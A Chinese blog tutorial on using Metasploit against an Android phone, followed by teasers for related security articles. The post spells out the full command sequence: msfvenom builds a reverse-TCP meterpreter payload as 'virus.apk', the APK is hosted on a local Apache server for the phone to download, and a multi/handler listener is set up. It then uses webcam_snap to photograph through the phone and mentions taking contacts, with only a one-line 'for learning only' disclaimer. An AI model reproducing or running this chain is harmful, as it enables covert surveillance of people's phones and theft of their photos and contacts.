利用msf框架对安卓手机进行简单操作

一颗小胡椒2021-08-15 21:25:21

测试机型红米k30

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > virus.apk (输入自己的ip,设置端口和apk格式,生成apk)

 service apache2 start  (启动服务)

 sudo cp virus.apk /var/www/html   (复制该文件到html,这里需要管理员权限,前面加sudo,后面再输入不可见密码)

ls virus.apk /var/www/html(查看文件是否在当前文件夹下)

msfconsole (启动metasploit框架)

use multi/handler(在kali设置监听程序)

 set payload android/meterpreter/reverse_tcp(设置载体,工具,协议)

options(查看配置)

 

set lhost 自己的ip(与前面的apk一样)

set lport 端口号(同上)

接下来在手机上装apk,浏览器搜索192.168.0.106/virus.apk

  

run(启动) 

webcam_snap(利用手机进行拍照,注:这里已经在手机开启了权限设置,并且程序在运行中)

还可以用命令获取联系人等。

输入?可提示各种功能,这里就不一一列举啦! 

本篇仅供学习,请勿用于其他非法用途。

apk手机
本作品采用《CC 协议》,转载必须注明作者和本文链接
利用wirkeshake抓包初步分析配置本地PC的ip为192.168.5.150并在上面运行server,然后在pixel手机上安装client_连接192.168.5.150服务器.apk手机ip为192.168.5.221,在PC上通过wireshake进行抓包。如下所示,看到No.14是手机发给server的HTTP GET包,No.17为server发给手机的HTTP报文。
交互式反汇编器,简称为IDA。是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器!此章节让我们熟悉通过IDA修改参数、函数、返回值,同时详细解读标志位的概念,熟悉堆栈及详细解读ARM三级流水线概念和ARM编码编译为二进制的全过程。
msf是一个免费框架,可用命令生成一个可监听的木马程序。
最高人民法院日前发布第35批指导性案例。经鉴定,“社工库资料”经去除无效数据并进行合并去重后,包含各类公民个人信息共计8100万余条。上海市奉贤区人民检察院以社会公共利益受到损害为由,向上海市奉贤区人民法院提起刑事附带民事公益诉讼。
最近在学习Android APP客户端漏洞挖掘过程中,对Android APP端漏洞挖掘做了一个基本的梳理总结本节主要是在介绍Android APP漏洞挖掘过程中,使用常见的Android漏洞挖掘工具的安装和使用办法,帮助Android漏洞挖掘人员提供便利。本文里面一部分的介绍采摘与网络博客,大家可以点击对应的网址进行查看。
国家级APT(Advanced Persistent Threat,高级持续性威胁)组织是有国家背景支持的顶尖黑客团伙,专注于针对特定目标进行长期的持续性网络攻击。 奇安信旗下的高级威胁研究团队红雨滴(RedDrip Team)每年会发布全球APT年报【1】、中报,对当年各大APT团伙的活动进行分析总结。 虎符智库特约奇安信集团旗下红雨滴团队,开设“起底国家级APT组织”栏目,逐个起底全球各地
初衷是刷抖音太多,发现不能在点赞过的视频列表中直接搜索,就想自己实现下,把这个过程做了下记录,当学习笔记了,纯技术交流用。
本文讨论的重打包,是指“破解版”,运行环境受(普通用户的手机)限制,毕竟你不能要求用户魔改刷机root才能使用“破解版”。另:没有永远的安全,全看cracker的水平有多高。
一颗小胡椒
暂无描述